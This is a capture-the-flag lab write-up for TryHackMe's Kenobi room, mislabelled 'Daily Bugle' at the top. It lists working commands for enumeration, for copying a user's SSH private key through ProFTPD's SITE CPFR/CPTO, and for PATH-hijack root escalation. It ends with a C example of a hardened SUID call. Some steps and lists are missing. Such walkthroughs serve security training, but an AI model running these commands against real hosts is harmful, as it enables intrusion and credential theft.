Today let’s play a CTF called Daily Bugle at https://tryhackme.com/room/kenobi
NOTICE: (SPOILER!!) If you would like to solve it by yourself, don’t read this post!
To start with we are going to perform some basic enumeration using nmap!
nmap -sS -p- -vvv -O -A -T4 -sC -sV -oA kenobi 10.10.87.63
Here we notice that there are a range of services open including:
Now that we have identified the services, we also look at the versions etc. to try and identify whether they have any known vulnerabilities.
Seeing TCP 445 open raises a red flag, so we head here and look to enumerate further!
nmap -sS -p 445 -vvv -O -A -T4 -sC -sV -oA kenobi-smb --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.87.63
We notice from this scan that a share is accessible using NULL authentication.
smbclient: connect to the share
Press ENTER at the password prompt to use a NULL password.
Now that we are connected, we can see that there is content in the anonymous share. Let's go ahead and use the smbget command to download it so that we can analyse it from our attacker machine.
smbget -R smb://10.10.87.63/anonymous
nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.87.63
We can see another service running on the host is ProFTPD. We can look here to see if there are any known vulnerabilities in this product (and specifically this version).
We also use searchsploit to search for the product name and specifically the version (it's good practice to search for a few combinations).
This vulnerability means that unauthenticated clients can execute commands remotely (RCE) against the service.
ProFTPD includes the following commands:
- SITE CPFR
- SITE CPTO
Connect to the FTP service with netcat and issue the two SITE commands:
nc 10.10.87.63 21
SITE CPFR /home/kenobi/.ssh/id_rsa
SITE CPTO /var/tmp/id_rsa
What we have done here is copy the private key to the /var/tmp/ folder.
Now we are going to mount this using NFS
mkdir /mnt/kenobiNFS
mount 10.10.87.63:/var /mnt/kenobiNFS
ls -la /mnt/kenobiNFS
cp /mnt/kenobiNFS/tmp/id_rsa /pentest/tryhackme/Kenobi
chmod 600 id_rsa
ssh -i id_rsa kenobi@10.10.87.63
We have now gained access to an SSH shell in userland as Kenobi!
Privilege Escalation using PATH Variable Manipulation
Search for files with the SUID bit set:
find / -perm -u=s -type f 2>/dev/null
The binary that is not a standard system binary (LOLBin) is /usr/bin/menu.
Running strings on the binary:
We can see here that the binary runs other binaries without a full path. This, combined with the SUID bit, means the binary can be made to execute commands as root.
To abuse this, we can do the following:
# change to the tmp directory
cd /tmp
# write the path of the shell into a file named curl in tmp
echo /bin/sh > curl
# make the file executable
chmod 777 curl
# add /tmp to the front of the $PATH variable
export PATH=/tmp:$PATH
UNIX permissions can seem confusing if you are coming from a Windows background. I found a great little site that converts permission values into a clear, readable format:
Now we are root!
Now we need to get the flag!
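As an added illustration (not part of the original writeup or the room's own code), here is the unsafe pattern the page describes for /usr/bin/menu beside a hardened version a SUID binary should use: the command is resolved only against a fixed list of trusted directories, executed without a shell, and given a minimal environment so the caller's PATH cannot influence it. The function names and the trusted directory list are assumptions of mine.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* Fixed search path used by the hardened code (assumed list); the caller's $PATH is never consulted. */
static const char *const TRUSTED_DIRS[] = { "/usr/bin", "/bin", NULL };

/* Vulnerable pattern (what the page describes for /usr/bin/menu): a bare
 * command name handed to system(), so whichever "curl" comes first on the
 * caller's $PATH is what the SUID process executes. */
int run_unsafe(void) {
    return system("curl -I localhost");
}

/* Resolve a bare command name against TRUSTED_DIRS only. Returns 1 and fills
 * `out` with the absolute path when an executable is found, 0 otherwise. */
int resolve_trusted(const char *name, char *out, size_t out_len) {
    if (name == NULL || name[0] == '\0' || strchr(name, '/') != NULL)
        return 0;                      /* names only, never caller-supplied paths */
    for (int i = 0; TRUSTED_DIRS[i] != NULL; i++) {
        int n = snprintf(out, out_len, "%s/%s", TRUSTED_DIRS[i], name);
        if (n < 0 || (size_t)n >= out_len) return 0;
        if (access(out, X_OK) == 0) return 1;
    }
    return 0;
}

/* Hardened pattern: absolute path, no shell, and a minimal environment so
 * PATH and LD_* variables from the caller cannot reach the child. Returns the
 * child's exit status, or -1 if the command is not in a trusted directory. */
int run_safe(const char *name, const char *arg1) {
    char path[256];
    if (!resolve_trusted(name, path, sizeof path))
        return -1;
    char *const argv[] = { path, (char *)arg1, NULL };
    char *const envp[] = { "PATH=/usr/bin:/bin", NULL };
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        execve(path, argv, envp);      /* only reached with a trusted absolute path */
        _exit(127);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

With a PATH of /tmp:$PATH, run_unsafe() would execute a file named curl from /tmp, while run_safe("curl", ...) ignores the caller's PATH entirely.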
Well, that again was a good experience. I like the way it walks you through. It would have been better if it had included visiting the web services and running common web enumeration etc. (e.g. Nikto).
But overall, I like the platform and I like the way it is going into details about the vulnerabilities and config along the route. It gives you the freedom to explore whilst helping people learn, this is a great capability from a learning platform from my point of view.